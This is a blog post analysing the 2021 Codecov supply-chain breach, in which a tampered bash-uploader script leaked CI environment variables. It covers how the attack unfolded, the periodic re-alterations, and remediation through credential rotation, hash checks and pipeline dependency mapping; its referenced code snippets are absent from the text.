Pipeline Composition Analysis: How your CI pipeline presents new opportunities for attackers

The case of the Codecov hack

Eylam Milner
7 min readApr 18, 2021

It’s pretty amazing to consider the level of trust we put in lines like these -

Well, specifically that second line. Which is at the center of an ongoing investigation as part of the Codecov breach that became public on 15th April 2021.

These instructions are the way modern CI pipelines are constructed — they use a set of building blocks (also known as — actions, tasks, orbs… Depending on the platform) to take raw source-code, run a series of tests, validations, and compilation tasks, to achieve a final artifact as output.

Oh, and these building blocks are just external code projects. Written by anyone, published for everyone. To consume them is as easy as installing an app from the marketplace, and looks something like this -

It’s not a new concept, using someone else’s code in your application. Open source has been mainstream for years, so why is this an issue? Because it has now become extremely easy to use external code as part of the software release process. It is no longer your application’s dependencies, but rather your pipeline’s dependencies. External code running in your CI has access to your code project as a whole, the infrastructure it’s running on, and the environment set up for it (with sensitive data like API keys, credentials, and access tokens).

Sounds like something that could be taken advantage of? Well, it is, and it was.

So what happened in the Codecov hack?

First, an important note — at the time of writing this, the exact details of what and how are still not fully known, so I’ll outline the events as they took place according to Codecov themselves.

For people in a hurry

  1. An attacker gained access to Codecov’s private Google Cloud, which hosted a script file used by a lot of their customers (directly by downloading it, or indirectly by using some of Codecov’s provided CI steps).
  2. Then basically added a single new line to it which sends out all sensitive information used in the customer’s CI environment, whenever a release is triggered.
  3. Every company using this script (which is an essential part of Codecov solution) potentially sent out — credentials, access tokens, API keys, and more… To the attacker, and must now revoke and replace them.

To be more specific

Codecov Google Cloud Storage key was leaked through the codecov docker image. How? Well, it has yet to be revealed, but there are some very common ways for engineers to make this possible, i.e — Leave it in plain text in the dockerfile, use the ARG command for sensitive variables, or Improperly utilizing .dockerignore and accidentally pushing unwanted files like .env.

Once the access to GCP was gained, the attacker altered a script named bash-uploader which helps upload the coverage report generated by Codecov to the Codecov platform itself.

The bash-uploader itself is a small utility that looks like this -

And the new line added by the attacker 🥁 -

What does it do? Sends out the list of environment variables (which could be highly sensitive) to a specific remote URL where the attacker can access them.

From that point on, there are two ways to actually be affected by the attack — You either explicitly download and use the bash-uploader script or you use one of the ready-made steps by Codecov — action in Github, orb in CircleCI, and step in Bitrise (which use this script themselves).

And that’s it. Once any of those lines are added to the project’s pipeline it is exposed to any vulnerability these external dependencies bring with them.

Now those of you who read the statement by Codecov CEO might have noticed this —

Our investigation has determined that beginning January 31, 2021, there were periodic, unauthorized alterations of our Bash Uploader script by a third party, which enabled them to potentially export information stored in our users’ continuous integration (CI) environments.

First time reading this I was kinda thrown off. What’s with the periodic alterations? So I did a little digging. Codecov stated the file was maliciously altered on January 31, 2021. And the discovery of the foul play was only on April 1st (which must have been a hoot). That means there was probably some work done during those two months in between, right? Changes committed to the bash-uploader script?

The Github page of the project shows this indeed was the case -

Changes were pushed to the bash-uploader file (elegantly named codecov). And that green checkmark sign next to some of them — indicating a successful build.

This means the build job (specifically here using CircleCI) has created a new version of the bash-uploader file — one that is not affected by the bad alteration — and has successfully pushed it to the official location where Codecov customers download it from (https://codecov.io/bash).

Here where this magic happens -

.circleci/config.yml - uploading the new version of the `codecov` util

Well, there we have it. The attacker’s changes to the uploader util must have been overridden by any successful version release of the codecov-bash project. Unless 🤔… This bad line must have been added again, and again, every time after a new version of the codecov util was uploaded, it was again altered with the malicious change sending out sensitive information. Hence, the periodic.

Consequences

Results of this incident are still unfolding. For now, we know that projects who used this codecov-bash dependency in their pipeline, one way or another, between January 31, 2021 and April 1st, 2021 are potentially at risk. A very rough (and in no way official!) estimation shows close to 15,000 files using the bash-uploader script in hundreds of different open-source projects today.

Some high-profile projects are on that list, like — argo-cd, ansible, webpack, K8S, and more. Now, this DOES NOT mean they are compromised, however, it does mean they utilize Codecov and have been using the bash-uploader.

Remediation

Since this is an ongoing event, I’ll separate the remediation aspect into recovery, and prevention.

Recovery

If you think you are in any way affected by this event, Codecov official instruction is to -

“… immediately re-roll all of their credentials, tokens, or keys located in the environment variables in their CI processes that used one of Codecov’s Bash Uploaders.”

This means accessing the secrets tab at your CI platform, and manually (some allow those changes through the API) revoke existing sensitive data you don’t want anyone outside your company to ever see, and generate new ones to replace them with.

On top of that, there is a simple integrity check to test the authenticity of the bash-uploader script before actually using it. It’s optional, though you should probably treat it as mandatory.

Instead of simply pulling the script and running it, you also pull its hash value (calculated for you by Codecov) and simply compare the two. This was the way this little incident came to be known in the first place — one of Codecov’s customers noticed the hash mismatch.

Prevention

CI/CD pipelines (and DevOps infrastructure in general) are a technological engine. They allow software to be built, tested, and delivered faster than ever, pushing the development community forward. And Integrating community-powered code into private software delivery pipelines is a big part of it. It does not, however, mean compromising security. We should start treating our complex pipelines as an integral part of our software and protect them accordingly.

Pipeline Composition Analysis means just that. Map all the moving parts in your software delivery pipeline, know what you use, scan for vulnerabilities and misconfigurations and respond quickly or better yet automatically.

As this event unfolds, I’ll be sure to share more. In the meantime — good luck! And have a safe delivery 📦.

--

--